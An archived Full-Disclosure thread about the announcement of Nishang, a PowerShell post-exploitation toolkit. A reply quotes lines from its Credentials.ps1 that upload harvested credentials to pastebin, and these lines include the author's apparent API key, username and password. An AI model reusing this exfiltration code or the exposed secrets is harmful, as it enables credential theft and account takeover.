lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 16 Aug 2012 08:39:03 -0400
From: Harry Hoffman <hhoffman@...solutions.net>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Nishang: PowerShell for Penetration Testing

Some time ago a colleague and I collaborated on a bit of software that
analyzed and reported on interesting/unknown/anomalous logs.

It reported via email. We published the code to the web in the hope
others would find it useful. I forgot and left my email addr as the
default mail to.

You'd be amazed that: a) people don't bother to look through the
code/configs and b) how much information you can gather when people
inadvertently send you all of their logs.

Just sayin'

Cheers,
Harry

On 08/15/2012 03:25 PM, Peter Dawson wrote:
> ....and this is coming from person who is "has many  years experience in
> Penetration Testing of many Government Organizations of India and other
> global corporate giants.
>  
> Who the friggin hell hires such peeps who give away key /userid/pwd eh ?
>  
> /pd
>  
> On Wed, Aug 15, 2012 at 2:52 PM, Harry Hoffman
> <hhoffman@...solutions.net <mailto:hhoffman@...solutions.net>> wrote:
> 
>     Probably at the least want to change your pastebin password and api key:
> 
>     >From Credentials.ps1:
> 
>     Post_http "http://pastebin.com/api/api_login.php"
>     "api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin"
> 
>     Post_http "http://pastebin.com/api/api_post.php"
>     "api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2"
> 
>     "
> 
>     Cheers,
>     Harry
> 
>     On 08/15/2012 05:49 AM, Nikhil Mittal wrote:
>     > Hi List,
>     >
>     > I have written a tool in PowerShell which helps in usage of PowerShell
>     > for post exploitation activity. The tool, called, Nishang. is a
>     > framework and collection of PowerShell scripts.
>     >
>     > Details about it could be found on my blog at
>     >
>     http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html
>     >
>     > The toolkit is available at:
>     > http://code.google.com/p/nishang/
>     >
>     > Please feel free to report bugs, feedbacks and feature requests.
>     >
>     > Regards,
>     > Nikhil _SamratAshok_ Mittal
>     > http://labofapenetrationtester.blogspot.com/
>     > @nikhil_mitt <https://twitter.com/#%21/nikhil_mitt>
>     >
>     >
>     > _______________________________________________
>     > Full-Disclosure - We believe in it.
>     > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>     > Hosted and sponsored by Secunia - http://secunia.com/
>     >
> 
>     _______________________________________________
>     Full-Disclosure - We believe in it.
>     Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>     Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists